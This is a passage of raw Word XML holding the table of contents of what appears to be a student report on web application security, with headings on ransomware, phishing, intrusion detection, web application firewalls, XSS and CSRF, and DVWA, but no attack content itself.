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7005F856" w14:textId="6A24A4D1" w:rsidR="00E67820" w:rsidRDefault="00531F31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>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4777168" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777168 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3014FE4B" w14:textId="07009E0A" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777169" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IT Background</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777169 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="306C513F" w14:textId="2A13E490" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777170" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Web Application Security (week 1-4)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777170 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4675BB19" w14:textId="0C631441" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777171" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exercises &amp; Challenges</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777171 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D97866D" w14:textId="0372262C" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777172" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Security Threat)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777172 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="290CBCFF" w14:textId="2A8C4DBA" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777173" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The CIA triad.</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777173 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68BB3B5B" w14:textId="63F50CD1" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777174" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777174 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71E0FF27" w14:textId="06834044" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777175" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777175 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FA966FD" w14:textId="53924B3C" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777176" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Viruses</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777176 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00E0E070" w14:textId="72D6A949" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777177" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Risk Analysis)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777177 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E0EEB13" w14:textId="02EDD557" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777178" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 2.2 (Host Intrusion Detection and Prevention (HIDS)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777178 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D5D0F32" w14:textId="4CC6A7B4" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777179" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host Intrusion Detection and Prevention System (HIDS)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777179 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="661CC78E" w14:textId="43EB2B0A" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777180" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 3.2 (Web Application Firewalls)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777180 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79207CFB" w14:textId="7E04ED2A" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777181" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 4.1 (XSS &amp; CSRF)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777181 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E67A6B0" w14:textId="152D9473" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777182" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777182 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1972915F" w14:textId="5602F2E6" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
